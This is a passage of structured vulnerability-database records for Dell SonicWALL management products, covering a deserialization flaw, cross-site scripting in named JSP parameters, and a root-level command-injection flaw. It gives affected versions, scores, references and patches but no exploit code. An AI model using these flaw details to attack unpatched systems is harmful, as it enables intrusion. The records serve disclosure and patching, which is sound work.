"id": "VHN-91216"
},
{
"db": "VULMON",
"id": "CVE-2016-2397"
},
{
"db": "BID",
"id": "84882"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"id": "VAR-201602-0123",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-91216"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:06:15.022000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SonicWALL Analyzer Product Notification",
"trust": 0.8,
"url": "https://support.software.dell.com/ja-jp/product-notification/185943"
},
{
"title": "SonicWALL has issued an update to correct this vulnerability. Hotfix 168056",
"trust": 0.7,
"url": "https://www.mysonicwall.com/firmware/downloadcenter.aspx"
},
{
"title": "Multiple Dell Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60259"
},
{
"title": "Java-Deserialization-CVEs",
"trust": 0.1,
"url": "https://github.com/palindromelabs/java-deserialization-cves "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"db": "VULMON",
"id": "CVE-2016-2397"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91216"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "NVD",
"id": "CVE-2016-2397"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "https://support.software.dell.com/product-notification/185943"
},
{
"trust": 1.8,
"url": "http://www.zerodayinitiative.com/advisories/zdi-16-163"
},
{
"trust": 1.2,
"url": "http://www.securitytracker.com/id/1035015"
},
{
"trust": 1.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-16-163/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2397"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2397"
},
{
"trust": 0.7,
"url": "https://www.mysonicwall.com/firmware/downloadcenter.aspx"
},
{
"trust": 0.3,
"url": "http://www.sonicwall.com/us/en/products/gms-series.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/83200"
},
{
"trust": 0.1,
"url": "https://github.com/palindromelabs/java-deserialization-cves"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"db": "VULHUB",
"id": "VHN-91216"
},
{
"db": "VULMON",
"id": "CVE-2016-2397"
},
{
"db": "BID",
"id": "84882"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"db": "VULHUB",
"id": "VHN-91216"
},
{
"db": "VULMON",
"id": "CVE-2016-2397"
},
{
"db": "BID",
"id": "84882"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-10T00:00:00",
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"date": "2016-02-17T00:00:00",
"db": "VULHUB",
"id": "VHN-91216"
},
{
"date": "2016-02-17T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2397"
},
{
"date": "2016-02-17T00:00:00",
"db": "BID",
"id": "84882"
},
{
"date": "2016-03-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"date": "2016-02-17T15:59:07.690000",
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"date": "2016-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-10T00:00:00",
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-91216"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2397"
},
{
"date": "2016-09-01T17:00:00",
"db": "BID",
"id": "84882"
},
{
"date": "2016-03-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"date": "2018-03-12T17:31:18.707000",
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"date": "2016-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dell SonicWALL Product cliserver Implementation of deserialization vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
],
"trust": 0.6
}
}
var-201312-0335
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp. Multiple Dell SonicWALL Products are prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. The following products are vulnerable: Dell SonicWALL Global Management System Dell SonicWALL Analyzer Dell SonicWALL Universal Managemnet Appliance E5000. Dell SonicWALL GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Dell SonicWALL Analyzer is a set of network analyzer software for SonicWALL infrastructure. A remote, authorized attacker could exploit this vulnerability to inject arbitrary web script or HTML by creating a specially crafted request
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0335",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "uma e5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.1"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.1"
},
{
"model": "uma e5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.1"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "7.1 sp1 hotfix 134235"
},
{
"model": "sonicwall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.x"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "7.1 sp1 hotfix 134235"
},
{
"model": "sonicwall global management system",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.x"
},
{
"model": "sonicwall universal management appliance e5000",
"scope": null,
"trust": 0.8,
"vendor": "dell",
"version": null
},
{
"model": "sonicwall universal management appliance e5000 software",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "7.1 sp1 hotfix 134235"
},
{
"model": "sonicwall universal management appliance e5000 software",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.x"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_e5000_firmware:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_e5000_firmware:7.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_e5000_firmware:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sonicwall:uma_e5000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7025"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Benjamin Kunz Mejri",
"sources": [
{
"db": "BID",
"id": "64103"
}
],
"trust": 0.3
},
"cve": "CVE-2013-7025",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-7025",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "VHN-67027",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-7025",
"trust": 1.8,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-154",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-67027",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67027"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp. Multiple Dell SonicWALL Products are prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. \nThe following products are vulnerable:\nDell SonicWALL Global Management System\nDell SonicWALL Analyzer\nDell SonicWALL Universal Managemnet Appliance E5000. Dell SonicWALL GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Dell SonicWALL Analyzer is a set of network analyzer software for SonicWALL infrastructure. A remote, authorized attacker could exploit this vulnerability to inject arbitrary web script or HTML by creating a specially crafted request",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"db": "BID",
"id": "64103"
},
{
"db": "VULHUB",
"id": "VHN-67027"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-67027",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67027"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7025",
"trust": 2.8
},
{
"db": "BID",
"id": "64103",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "30054",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1029433",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "100610",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "55923",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005496",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-154",
"trust": 0.7
},
{
"db": "FULLDISC",
"id": "20131205 SONICWALL GMS V7.X - FILTER BYPASS \u0026 PERSISTENT VULNERABILITY",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-83518",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-67027",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67027"
},
{
"db": "BID",
"id": "64103"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
]
},
"id": "VAR-201312-0335",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-67027"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:29:47.779000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability",
"trust": 0.8,
"url": "http://www.sonicwall.com/us/shared/download/support_bulletin_gms_vulnerability_hotfix_134235.pdf"
},
{
"title": "\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b Dell SonicWALL GMS \u30b5\u30fc\u30d3\u30b9\u901f\u5831",
"trust": 0.8,
"url": "http://www.sonicwall.com/japan/support/support_notice131209.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67027"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"db": "NVD",
"id": "CVE-2013-7025"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.vulnerability-lab.com/get_content.php?id=1099"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/64103"
},
{
"trust": 1.7,
"url": "http://www.sonicwall.com/us/shared/download/support_bulletin_gms_vulnerability_hotfix_134235.pdf"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/30054"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2013/dec/32"
},
{
"trust": 1.7,
"url": "http://osvdb.org/100610"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1029433"
},
{
"trust": 1.1,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0022.html"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/55923"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89462"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7025"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7025"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67027"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-67027"
},
{
"db": "BID",
"id": "64103"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-67027"
},
{
"date": "2013-12-05T00:00:00",
"db": "BID",
"id": "64103"
},
{
"date": "2013-12-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"date": "2013-12-09T16:36:50.723000",
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"date": "2013-12-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-67027"
},
{
"date": "2013-12-11T00:47:00",
"db": "BID",
"id": "64103"
},
{
"date": "2013-12-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005496"
},
{
"date": "2018-03-12T17:22:58.757000",
"db": "NVD",
"id": "CVE-2013-7025"
},
{
"date": "2013-12-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dell SonicWALL Product Alert Settings Section cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005496"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-154"
}
],
"trust": 0.6
}
}
var-201411-0383
Vulnerability from variot
The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors. Authentication is required to exploit this vulnerability.The specific flaw exists within the GMS ViewPoint (GMSVP) web application. The issue lies in the handling of configuration input due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges on the underlying operating system. Multiple Dell SonicWALL Products are prone to multiple remote code-execution vulnerabilities. Successful exploitation can completely compromise the vulnerable device. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA is a set of universal management device software
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0383",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": null
},
{
"model": "sonicwall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp2"
},
{
"model": "sonicwall global management system",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp2"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp2"
},
{
"model": "gms virtual appliance",
"scope": null,
"trust": 0.7,
"vendor": "sonicwall",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-385"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005638"
},
{
"db": "NVD",
"id": "CVE-2014-8420"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-411"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
